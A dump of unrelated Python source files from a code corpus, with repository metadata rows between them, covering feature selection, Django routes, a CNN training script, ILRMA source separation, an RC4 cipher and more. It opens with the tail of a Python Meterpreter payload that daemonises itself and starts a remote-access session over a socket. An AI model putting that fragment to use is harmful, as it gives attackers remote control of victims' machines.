TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s)
met.run()
| 33.737226 | 134 | 0.706044 |
b814b973d8e54a857c2c3fc248c1064d45ba00c1 | 8,599 | py | Python | utils/dev/feature.py | brunocvs7/bot_detection_twitter_profile_features | 44a88b0774bdab33da78f7679e109ccd8c34f4df | [
"MIT"
] | 1 | 2021-11-03T02:22:57.000Z | 2021-11-03T02:22:57.000Z | utils/dev/feature.py | brunocvs7/bot_detection_twitter_profile_features | 44a88b0774bdab33da78f7679e109ccd8c34f4df | [
"MIT"
] | null | null | null | utils/dev/feature.py | brunocvs7/bot_detection_twitter_profile_features | 44a88b0774bdab33da78f7679e109ccd8c34f4df | [
"MIT"
] | 1 | 2021-11-01T00:49:07.000Z | 2021-11-01T00:49:07.000Z | from sklearn.preprocessing import MinMaxScaler
from sklearn.pipeline import Pipeline
from scipy.stats import chi2_contingency
from sklearn.compose import ColumnTransformer
from boruta import BorutaPy
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import OrdinalEncoder
from sklearn.impute import SimpleImputer
from scipy.stats import pointbiserialr
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold, cross_val_score
import pandas as pd
import numpy as np
def point_biserial(df, y, num_columns = None, significance=0.05):
'''
Perform feature selection based on correlation test.
Parameters:
df (pandas.dataframe): A dataframe containing all features and target
num_columns (list): A list containing all categorical features. If empty list, the function tries to infer the categorical columns itself
y (string): A string indicating the target.
Returns:
columns_remove_pb (list):
'''
correlation = []
p_values = []
results = []
if num_columns:
num_columns = num_columns
else:
num_columns = df.select_dtypes(include=['int','float', 'int32', 'float64']).columns.tolist()
for col in num_columns:
df[col] = df[col].fillna(df[col].median())
correlation_aux, p_value_aux = pointbiserialr(df[col], df[y])
correlation.append(correlation_aux)
p_values.append(p_value_aux)
if p_value_aux <= significance:
results.append('Reject H0')
else:
results.append('Accept H0')
pb_df = pd.DataFrame({'column':num_columns, 'correlation':correlation, 'p_value':p_values, 'result':results})
columns_remove_pb = pb_df.loc[pb_df['result']=='Accept H0']['column'].values.tolist()
return pb_df, columns_remove_pb
def chi_squared(df, y, cat_columns = None, significance=0.05):
'''
Performs chi2 hypothesis test to find relationship between predictors and target in a data frame
Parameters:
df (pandas.dataframe): A data frame containing categorical features and target variable
y (string): A string that saves the name of target variable
cat_columns (list): A list with the name of categorical features. If None, function tries to infer It by itself
significance (float): A float number indicating the significance level for the test. Deafult is 0.05
Retorna:
chi2_df (pandas.dataframe): A data frame with the results of the tests
columns_remove_chi2 (list): A list of columns that should be removed
logs (list): A list of columns that could not be evaluated
'''
p_values = []
logs = []
chi2_results = []
results = []
if cat_columns == None:
cat_columns = df.select_dtypes(['object']).columns.tolist()
else:
cat_columns = cat_columns
for cat in cat_columns:
cross_table = pd.crosstab(df[cat], df[y])
if not cross_table[cross_table < 5 ].count().any():
cross_table = pd.crosstab(df[cat], df[y])
chi2, p, dof, expected = chi2_contingency(cross_table.values)
chi2_results.append(chi2)
p_values.append(p)
else:
logs.append("Column {} could'nt be evaluated".format(cat))
chi2_results.append(np.nan)
p_values.append(np.nan)
for p in p_values:
if p <= significance:
results.append('Reject H0')
else:
results.append('Accept H0')
chi2_df = pd.DataFrame({"column":cat_columns, 'p-value':p_values,'chi2':chi2_results, 'results':results})
columns_remove_chi2 = chi2_df.loc[chi2_df['results']=='Accept H0']['column'].values.tolist()
return chi2_df, columns_remove_chi2, logs | 41.946341 | 186 | 0.636818 |
b814f40aa31389fa14c7b83364d7da4918d56140 | 6,293 | py | Python | apiserver/apiserver/web/challenge.py | AlexParra03/Halite-III | 1f108a0d9a07397400621e9a7ccefd7f4f13fee2 | [
"MIT"
] | 1 | 2021-07-01T20:57:24.000Z | 2021-07-01T20:57:24.000Z | apiserver/apiserver/web/challenge.py | the-higgs/Halite-III | 1f108a0d9a07397400621e9a7ccefd7f4f13fee2 | [
"MIT"
] | null | null | null | apiserver/apiserver/web/challenge.py | the-higgs/Halite-III | 1f108a0d9a07397400621e9a7ccefd7f4f13fee2 | [
"MIT"
] | null | null | null | """
User challenge API endpoints - list user's challenges & issue new ones
"""
import datetime
import flask
import sqlalchemy
from .. import model, util
from . import match as match_api
from . import util as api_util
from .blueprint import web_api
| 36.587209 | 87 | 0.622755 |
b8155fb4487ab6eefaea72ef47aa753b0a19b9bd | 264 | py | Python | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-12-08T19:00:33.000Z | 2020-12-08T19:00:33.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 3 | 2021-03-30T13:47:03.000Z | 2021-09-22T19:03:46.000Z | txtjokes/urls.py | paqman85/txtjokes | d5b9faa1fd3f797c2feee277b8cd428cc05a17ed | [
"MIT"
] | 1 | 2020-04-24T14:39:03.000Z | 2020-04-24T14:39:03.000Z | from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('txt-jokes-administratus/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
]
| 24 | 54 | 0.704545 |
b8180b5b5c77d3a1a684f4f02028d017f4b7a210 | 1,909 | py | Python | newsservice/requestnews.py | mohawk781/newsservice | 0b7007c632211e35000dfba5e8ff9f23cff9450d | [
"Apache-2.0"
] | null | null | null | newsservice/requestnews.py | mohawk781/newsservice | 0b7007c632211e35000dfba5e8ff9f23cff9450d | [
"Apache-2.0"
] | 1 | 2021-06-01T23:59:17.000Z | 2021-06-01T23:59:17.000Z | newsservice/requestnews.py | mohawk781/newsservice | 0b7007c632211e35000dfba5e8ff9f23cff9450d | [
"Apache-2.0"
] | 1 | 2019-09-06T10:51:08.000Z | 2019-09-06T10:51:08.000Z | import json
from newsservice.models import News
from flask import (Blueprint, request)
bp = Blueprint('request', __name__)
| 38.959184 | 133 | 0.655317 |
b8185170e7135ee17602f233ff3d6eb5d6bbc140 | 943 | py | Python | tests/test_lexer.py | movermeyer/rexlex | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | [
"BSD-3-Clause"
] | null | null | null | tests/test_lexer.py | movermeyer/rexlex | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | [
"BSD-3-Clause"
] | null | null | null | tests/test_lexer.py | movermeyer/rexlex | 6c451a3b7e9134cbdf895a7ec5682e480480ef1a | [
"BSD-3-Clause"
] | 1 | 2018-03-05T00:40:04.000Z | 2018-03-05T00:40:04.000Z | import re
import unittest
from rexlex import Lexer
from rexlex.lexer.itemclass import get_itemclass
| 21.930233 | 54 | 0.510074 |
b8187e4887ed852a5b867debdeeccee5408895fe | 7,134 | py | Python | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | 2 | 2018-02-05T12:41:31.000Z | 2018-11-23T04:13:13.000Z | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | Engine/src/tests/algorithms/neuralnetwork/convolutional/conv_net_test.py | xapharius/HadoopML | c0129f298007ca89b538eb1a3800f991141ba361 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
import utils.imageutils as imgutils
import utils.numpyutils as nputils
from algorithms.neuralnetwork.convolutional.conv_net import ConvNet
from datahandler.numerical.NumericalDataSet import NumericalDataSet
import utils.serialization as srlztn
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | 49.2 | 158 | 0.610457 |
b819490a0e749fdb6fa33717dab9405f34226e11 | 2,747 | py | Python | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | null | null | null | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 23 | 2017-08-25T16:48:57.000Z | 2022-02-16T00:55:42.000Z | docker/eXist-seed/app/connector.py | ThomasTos/Pogues-Back-Office | b346d94407bf36e37d705b1d220ab0775a120574 | [
"MIT"
] | 13 | 2017-07-03T09:15:36.000Z | 2021-07-02T07:43:10.000Z | import requests
from requests.auth import HTTPBasicAuth
import sys
import os
from string import rfind
import base64 | 32.702381 | 127 | 0.581361 |
b81a09ef1cba709f702bd49fe66d6f2697a395a3 | 5,736 | py | Python | handy/2011722086_Assign3/main_app.py | HDNua/kwin | 33ce866c2b37faa1a5940354a0e5b3919e5eecc8 | [
"MIT"
] | 2 | 2017-11-01T12:46:06.000Z | 2017-12-02T04:01:25.000Z | handy/2011722086_Assign3/main_app.py | HDNua/kwin | 33ce866c2b37faa1a5940354a0e5b3919e5eecc8 | [
"MIT"
] | null | null | null | handy/2011722086_Assign3/main_app.py | HDNua/kwin | 33ce866c2b37faa1a5940354a0e5b3919e5eecc8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue May 30 16:43:10 2017
provided code
@author: Minsooyeo
"""
import os
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
from PIL import Image as im
import numpy as np
import utills as ut
import tensorflow as tf
sess = tf.InteractiveSession()
train_epoch = 5000
#
FLAG_FINGER = 0
FLAG_FACE = 1
FLAG_ANGLE = 2
flag = FLAG_ANGLE
#
if flag is FLAG_FINGER:
class_num = 5
additional_path = '\\finger\\'
elif flag is FLAG_FACE:
class_num = 6
additional_path = '\\face\\'
elif flag is FLAG_ANGLE:
class_num = 4
additional_path = '\\angle\\'
else:
raise Exception("Unknown flag %d" %flag)
# define parameter
data_length = []
dir_image = []
data = []
label = []
data_shape = [298, 298]
current_pwd = os.getcwd()
for i in range(class_num):
dir_image.append(ut.search(current_pwd + additional_path + str(i + 1)))
data_length.append(len(dir_image[i]))
data.append(np.zeros([data_length[i], data_shape[1], data_shape[0]]))
label.append(np.zeros([data_length[i], class_num]))
label[i][:, i] = 1
# load data
for q in range(class_num):
for i in range(data_length[q]):
if i % 100 == 0:
print("%dth data is opening" %i)
data[q][i, :, :] = np.mean(im.open(current_pwd + additional_path + str(q + 1) + '\\' + dir_image[q][i]), -1)
if flag is FLAG_FINGER:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4]), axis=0)
elif flag is FLAG_FACE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3], data[4], data[5]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3], label[4], label[5]), axis=0)
elif flag is FLAG_ANGLE:
rawdata = np.concatenate((data[0], data[1], data[2], data[3]), axis=0)
raw_label = np.concatenate((label[0], label[1], label[2], label[3]), axis=0)
else:
raise Exception("Unknown class number %d" %class_num)
del data
del label
total_data_poin = rawdata.shape[0]
permutation = np.random.permutation(total_data_poin)
rawdata = rawdata[permutation, :, :]
raw_label = raw_label[permutation, :]
rawdata = np.reshape(rawdata, [rawdata.shape[0], data_shape[0] * data_shape[1]])
########################################################################################################
#
img_width = data_shape[0]
img_height = data_shape[1]
if flag is FLAG_FINGER:
train_count = 5000 # . (2000 5000 )
test_count = 490
elif flag is FLAG_FACE:
train_count = 2000 # train data 5000 overfitting NaN . !
test_count = 490
elif flag is FLAG_ANGLE:
train_count = 6000 # train data 5000 overfitting NaN . !
test_count = 1000
else:
raise Exception("unknown flag %d" %flag)
#
train_epoch = train_count
#
TrainX = rawdata[:train_count] # mnist.train.images
TrainY = raw_label[:train_count] # mnist.train.labels
testX = rawdata[train_count:train_count+test_count] # mnist.test.images
testY = raw_label[train_count:train_count+test_count] # mnist.test.labels
# else .
if flag is FLAG_FINGER: # .
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
[3, 2, 128, True],
[3, 2, 64, True],
[3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_FACE: # 2 . .
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[3, 2, 32, True],
[3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 64, True],
# [3, 2, 128, True],
# [3, 2, 128, True],
])
elif flag is FLAG_ANGLE: #
CNNModel, x = ut._CNNModel(img_width=img_width, img_height=img_height,
kernel_info=[
[1, 1, 32, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [1, 1, 64, True],
# [1, 1, 128, True],
# [3, 2, 128, True],
])
else:
raise Exception("Unknown flag %d" %flag)
FlatModel = ut._FlatModel(CNNModel, fc_outlayer_count=128)
DropOut, keep_prob = ut._DropOut(FlatModel)
SoftMaxModel = ut._SoftMax(DropOut, label_count=class_num, fc_outlayer_count=128)
TrainStep, Accuracy, y_, correct_prediction = ut._SetAccuracy(SoftMaxModel, label_count=class_num)
sess.run(tf.global_variables_initializer())
for i in range(train_epoch):
tmp_trainX, tmp_trainY = ut.Nextbatch(TrainX, TrainY, 50)
if i%100 == 0:
train_accuracy = Accuracy.eval(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 1.0})
print("step %d, training accuracy %g"%(i, train_accuracy))
TrainStep.run(feed_dict={x: tmp_trainX, y_: tmp_trainY, keep_prob: 0.7})
print("test accuracy %g" %Accuracy.eval(feed_dict={x: testX[1:1000, :], y_: testY[1:1000], keep_prob: 1.0})) | 36.303797 | 116 | 0.566597 |
b81de3e83d88be8e9727e5be630e392a0dd09037 | 3,176 | py | Python | ilrma.py | annie-gu/MVAE | 252b052d69eae9a0b47f4058baf0fe565992f12f | [
"MIT"
] | 1 | 2022-01-08T03:31:31.000Z | 2022-01-08T03:31:31.000Z | ilrma.py | annie-gu/MVAE | 252b052d69eae9a0b47f4058baf0fe565992f12f | [
"MIT"
] | null | null | null | ilrma.py | annie-gu/MVAE | 252b052d69eae9a0b47f4058baf0fe565992f12f | [
"MIT"
] | 2 | 2020-06-21T12:55:53.000Z | 2020-11-16T00:56:36.000Z | import numpy as np
from common import projection_back
EPS = 1e-9
def ilrma(mix, n_iter, n_basis=2, proj_back=True):
"""Implementation of ILRMA (Independent Low-Rank Matrix Analysis).
This algorithm is called ILRMA1 in http://d-kitamura.net/pdf/misc/AlgorithmsForIndependentLowRankMatrixAnalysis.pdf
It only works in determined case (n_sources == n_channels).
Args:
mix (numpy.ndarray): (n_frequencies, n_channels, n_frames)
STFT representation of the observed signal.
n_iter (int): Number of iterations.
n_basis (int): Number of basis in the NMF model.
proj_back (bool): If use back-projection technique.
Returns:
tuple[numpy.ndarray, numpy.ndarray]: Tuple of separated signal and
separation matrix. The shapes of separated signal and separation
matrix are (n_frequencies, n_sources, n_frames) and
(n_sources, n_channels), respectively.
"""
n_freq, n_src, n_frame = mix.shape
sep_mat = np.stack([np.eye(n_src, dtype=mix.dtype) for _ in range(n_freq)])
basis = np.abs(np.random.randn(n_src, n_freq, n_basis))
act = np.abs(np.random.randn(n_src, n_basis, n_frame))
sep = sep_mat @ mix
sep_pow = np.power(np.abs(sep), 2) # (n_freq, n_src, n_frame)
model = basis @ act # (n_src, n_freq, n_frame)
m_reci = 1 / model
eye = np.tile(np.eye(n_src), (n_freq, 1, 1))
for _ in range(n_iter):
for src in range(n_src):
h = (sep_pow[:, src, :] * m_reci[src]**2) @ act[src].T
h /= m_reci[src] @ act[src].T
h = np.sqrt(h, out=h)
basis[src] *= h
np.clip(basis[src], a_min=EPS, a_max=None, out=basis[src])
model[src] = basis[src] @ act[src]
m_reci[src] = 1 / model[src]
h = basis[src].T @ (sep_pow[:, src, :] * m_reci[src]**2)
h /= basis[src].T @ m_reci[src]
h = np.sqrt(h, out=h)
act[src] *= h
np.clip(act[src], a_min=EPS, a_max=None, out=act[src])
model[src] = basis[src] @ act[src]
m_reci[src] = 1 / model[src]
h = m_reci[src, :, :, None] @ np.ones((1, n_src))
h = mix.conj() @ (mix.swapaxes(1, 2) * h)
u_mat = h.swapaxes(1, 2) / n_frame
h = sep_mat @ u_mat + EPS * eye
sep_mat[:, src, :] = np.linalg.solve(h, eye[:, :, src]).conj()
h = sep_mat[:, src, None, :] @ u_mat
h = (h @ sep_mat[:, src, :, None].conj()).squeeze(2)
sep_mat[:, src, :] = (sep_mat[:, src, :] / np.sqrt(h).conj())
np.matmul(sep_mat, mix, out=sep)
np.power(np.abs(sep), 2, out=sep_pow)
np.clip(sep_pow, a_min=EPS, a_max=None, out=sep_pow)
for src in range(n_src):
lbd = np.sqrt(np.sum(sep_pow[:, src, :]) / n_freq / n_frame)
sep_mat[:, src, :] /= lbd
sep_pow[:, src, :] /= lbd ** 2
model[src] /= lbd ** 2
basis[src] /= lbd ** 2
# Back-projection technique
if proj_back:
z = projection_back(sep, mix[:, 0, :])
sep *= np.conj(z[:, :, None])
return sep, sep_mat
| 37.809524 | 119 | 0.55699 |
b81ecc580a437a3d551ab5dfa4a59c26d6b5e052 | 367 | py | Python | tests/routes/test_pages.py | Biosystems-Analytics-Lab/shellcast | 8d578bfa3d66d75502f1a133fe6263d376694247 | [
"CC-BY-4.0"
] | 5 | 2021-03-24T19:19:48.000Z | 2022-01-11T09:27:13.000Z | tests/routes/test_pages.py | Biosystems-Analytics-Lab/shellcast | 8d578bfa3d66d75502f1a133fe6263d376694247 | [
"CC-BY-4.0"
] | 1 | 2022-01-13T15:11:09.000Z | 2022-01-13T21:16:10.000Z | tests/routes/test_pages.py | Biosystems-Analytics-Lab/shellcast | 8d578bfa3d66d75502f1a133fe6263d376694247 | [
"CC-BY-4.0"
] | null | null | null | import pytest
| 20.388889 | 34 | 0.700272 |
b81fcb30f8bd89568af442548e95ceeba2331cfd | 412 | py | Python | Task -01/loop.py | kanzul12/cp19_voice_detector | db5478b118bab46897b4230d366e11b9ad65e0ce | [
"MIT"
] | 2 | 2019-04-19T08:26:09.000Z | 2019-04-30T12:52:58.000Z | Task -01/loop.py | kanzul12/cp19_voice_detector | db5478b118bab46897b4230d366e11b9ad65e0ce | [
"MIT"
] | 5 | 2019-05-03T07:47:35.000Z | 2019-05-13T08:37:11.000Z | Task -01/loop.py | kanzul12/cp19_voice_detector | db5478b118bab46897b4230d366e11b9ad65e0ce | [
"MIT"
] | null | null | null | num= int (input("enter number of rows="))
for i in range (1,num+1):
for j in range(1,num-i+1):
print (" ",end="")
for j in range(2 and 9):
print("2","9")
for i in range(1, 6):
for j in range(1, 10):
if i==5 or i+j==5 or j-i==4:
print("*", end="")
else:
print(end=" ")
print()
| 16.48 | 44 | 0.383495 |
6293f58cd98657d8f6c935c1d17ddd8632667efa | 4,819 | py | Python | examples/racing/models/HyperNN.py | Chris-Carvelli/DeepNeuroevolution | 72e11fd08273ee1b25c346abd90b76a5975c39db | [
"MIT"
] | null | null | null | examples/racing/models/HyperNN.py | Chris-Carvelli/DeepNeuroevolution | 72e11fd08273ee1b25c346abd90b76a5975c39db | [
"MIT"
] | null | null | null | examples/racing/models/HyperNN.py | Chris-Carvelli/DeepNeuroevolution | 72e11fd08273ee1b25c346abd90b76a5975c39db | [
"MIT"
] | 1 | 2021-05-14T15:08:15.000Z | 2021-05-14T15:08:15.000Z | import random
import math
from functools import reduce
import torch
import torch.nn as nn
| 32.782313 | 87 | 0.552812 |
62961303726bbf57667dd5ce6020b5b0a4afb7e5 | 8,351 | py | Python | O.py | duongnguyenkt11/data-realtime | 9d8f6c8e0f6a766c058d0696669543dbafaff63c | [
"MIT"
] | null | null | null | O.py | duongnguyenkt11/data-realtime | 9d8f6c8e0f6a766c058d0696669543dbafaff63c | [
"MIT"
] | null | null | null | O.py | duongnguyenkt11/data-realtime | 9d8f6c8e0f6a766c058d0696669543dbafaff63c | [
"MIT"
] | null | null | null | from functools import reduce
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_notebook
from CONSTANTS import *
from utilities import *
from bokeh.plotting import figure, output_file, show
import pandas as pd, numpy as np
ENVIRON = C.LOCAL
| 41.137931 | 124 | 0.524009 |
6296eebeb1e65d269ec9089013edb6a402685434 | 6,790 | py | Python | project1/evaluation.py | DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch | bcb24a9258ea004a3694e6eaa524b499c2584f96 | [
"MIT"
] | null | null | null | project1/evaluation.py | DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch | bcb24a9258ea004a3694e6eaa524b499c2584f96 | [
"MIT"
] | null | null | null | project1/evaluation.py | DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch | bcb24a9258ea004a3694e6eaa524b499c2584f96 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# [0,0] = TN
# [1,1] = TP
# [0,1] = FP
# [1,0] = FN
# cm is a confusion matrix
# Accuracy: (TP + TN) / Total
# Precision: TP / (TP + FP)
# False positive rate: FP / N = FP / (FP + TN)
# True positive rate: TP / P = TP / (TP + FN)
# Equivalent to sensitivity/recall
# F1 score: 2 * precision * recall / (precision + recall)
# Returns a confusion matrix for labels and predictions
# [[TN, FP],
# [FN, TP]]
# Function to return two shuffled arrays, is a deep copy
# Shuffles and splits data into two sets
# test split will be 1/size of the data
# assume 5 fold for now
| 29.267241 | 126 | 0.610162 |
62982d88e6406e32cdc302d54bc0206efda33025 | 957 | py | Python | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 144 | 2020-09-13T22:54:57.000Z | 2022-02-24T21:54:25.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 587 | 2020-05-06T18:55:07.000Z | 2021-09-20T13:14:53.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 523 | 2020-09-09T12:07:13.000Z | 2022-02-24T21:54:31.000Z | '''
Problem:-
Given a string s, find the longest palindromic substring in s.
You may assume that the maximum length of s is 1000.
Example 1:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
''' | 25.184211 | 63 | 0.378265 |
6299c0fed43754304eadd3c72255fa97d06e27b5 | 119 | py | Python | pyimagesearch/utils/__init__.py | agoila/lisa-faster-R-CNN | 3b88c9b7da2106a805089f9619ea62cdc1f21d99 | [
"MIT"
] | 17 | 2018-09-09T10:56:58.000Z | 2022-02-22T07:18:50.000Z | pyimagesearch/utils/__init__.py | agoila/lisa-faster-R-CNN | 3b88c9b7da2106a805089f9619ea62cdc1f21d99 | [
"MIT"
] | null | null | null | pyimagesearch/utils/__init__.py | agoila/lisa-faster-R-CNN | 3b88c9b7da2106a805089f9619ea62cdc1f21d99 | [
"MIT"
] | 21 | 2018-09-19T11:07:10.000Z | 2022-02-22T07:18:45.000Z | # import the necessary packages
from .agegenderhelper import AgeGenderHelper
from .imagenethelper import ImageNetHelper | 39.666667 | 44 | 0.87395 |
6299f854c3c07764e1143810fd65fb9514af0ec6 | 2,965 | py | Python | pylibressl/cipher/onion.py | yl3dy/pylibressl | ffc3e195a31a6c96b28e52a7e146995219b220b2 | [
"MIT"
] | 2 | 2021-08-22T00:43:05.000Z | 2021-08-22T01:57:28.000Z | pylibressl/cipher/onion.py | yl3dy/pylibressl | ffc3e195a31a6c96b28e52a7e146995219b220b2 | [
"MIT"
] | null | null | null | pylibressl/cipher/onion.py | yl3dy/pylibressl | ffc3e195a31a6c96b28e52a7e146995219b220b2 | [
"MIT"
] | 1 | 2021-08-24T19:09:06.000Z | 2021-08-24T19:09:06.000Z | from .. import lib
from ..exceptions import *
from .. import _libressl
from .cipher import BaseCipher
from .auth import BaseCipherAuth
from .auth import GOST89_HMAC_Streebog512, AES256_GCM
ffi, clib = _libressl.ffi, _libressl.lib
Onion_AES256_GOST89 = OnionCipher.new((AES256_GCM, GOST89_HMAC_Streebog512),
name='Onion_AES256_GOST89')
Onion_AES256_GOST89.__doc__ = 'Onion ciphering: AES256-GCM + ' + \
'GOST89-HMAC-Streebog512'
| 37.0625 | 79 | 0.577403 |
629aa7218a98f287f8a5760fc5e65461390c3529 | 1,149 | py | Python | tests/plots/density_estimate.py | bws428/ambiance | 8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612 | [
"Apache-2.0"
] | 18 | 2020-03-06T14:54:29.000Z | 2022-03-21T20:20:42.000Z | tests/plots/density_estimate.py | bws428/ambiance | 8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612 | [
"Apache-2.0"
] | 7 | 2020-04-19T15:21:54.000Z | 2022-03-05T14:27:38.000Z | tests/plots/density_estimate.py | bws428/ambiance | 8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612 | [
"Apache-2.0"
] | 7 | 2019-12-30T16:22:24.000Z | 2021-09-08T07:36:23.000Z | import os
import numpy as np
import matplotlib.pyplot as plt
from ambiance import Atmosphere, CONST
HERE = os.path.abspath(os.path.dirname(__file__))
FILE_NAME = os.path.basename(__file__).replace('.py', '.png')
PATH_OUT = os.path.join(HERE, FILE_NAME)
# Make an atmosphere object
heights = np.linspace(-10e3, 90e3, num=1000)
rho_actual = Atmosphere(heights, check_bounds=False).density
rho_approx = density_estimate(heights)
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True, tight_layout=True)
ax1.plot(rho_actual, heights/1000, label='Actual', c='blue')
ax1.plot(rho_approx, heights/1000, '--', label='Estimate', c='red')
ax1.set_xlabel("Density [kg/m^3]")
ax1.set_ylabel("Height [km]")
ax1.set_xscale("log")
ax1.grid()
ax1.legend()
for ax in (ax1, ax2):
ax.axhline(y=CONST.h_min/1000, ls=':', color='black')
ax.axhline(y=CONST.h_max/1000, ls=':', color='black')
rdiff = (rho_approx - rho_actual)/rho_actual
ax2.plot(rdiff*100, heights/1000, label='Relative error', c='red')
ax2.set_xlabel("Relative error [%]")
ax2.grid()
plt.savefig(PATH_OUT)
plt.show()
plt.clf()
| 27.357143 | 68 | 0.711923 |
629b94b4505379de3aa682273cf3ce0b75e0c007 | 1,277 | py | Python | pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2015-01-29T06:52:36.000Z | 2015-01-29T06:52:36.000Z | pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
import numba.unittest_support as unittest
from numba.utils import PYVERSION
from .support import TestCase, enable_pyobj_flags
needs_set_literals = unittest.skipIf(PYVERSION < (2, 7),
"set literals unavailable before Python 2.7")
if __name__ == '__main__':
unittest.main()
| 29.697674 | 82 | 0.653876 |
629ca661207da75df901826b3e4cddc99718c385 | 1,188 | py | Python | docs/_static/rc4.py | Varbin/pep272-encryption | db0795396226a9d49d8825e29c550739ff222539 | [
"CC0-1.0"
] | 1 | 2021-07-08T21:37:17.000Z | 2021-07-08T21:37:17.000Z | docs/_static/rc4.py | Varbin/pep272-encryption | db0795396226a9d49d8825e29c550739ff222539 | [
"CC0-1.0"
] | null | null | null | docs/_static/rc4.py | Varbin/pep272-encryption | db0795396226a9d49d8825e29c550739ff222539 | [
"CC0-1.0"
] | null | null | null | from pep272_encryption import PEP272Cipher, MODE_ECB
block_size = 1
key_size = 0
assert RC4Cipher(b'\x01\x02\x03\x04\x05').encrypt(b'\x00'*16) \
== b"\xb29c\x05\xf0=\xc0'\xcc\xc3RJ\n\x11\x18\xa8"
| 27.627907 | 71 | 0.574074 |
629e0a7c590dbbe85c6d17dfffa34ca982e371ac | 12,316 | py | Python | Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py | Michael-Villano/Sublime-setup | 15a992d5982337169dadb50fd0dbca4ca3be992e | [
"MIT"
] | 49 | 2016-06-29T22:51:50.000Z | 2020-07-06T09:15:41.000Z | Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py | Michael-Villano/Sublime-setup | 15a992d5982337169dadb50fd0dbca4ca3be992e | [
"MIT"
] | 1 | 2019-07-20T11:09:14.000Z | 2019-07-20T11:09:14.000Z | Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py | Michael-Villano/Sublime-setup | 15a992d5982337169dadb50fd0dbca4ca3be992e | [
"MIT"
] | 13 | 2016-09-13T13:26:24.000Z | 2021-04-28T03:17:19.000Z | """
color_scheme_matcher.
Licensed under MIT.
Copyright (C) 2012 Andrew Gibson <agibsonsw@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
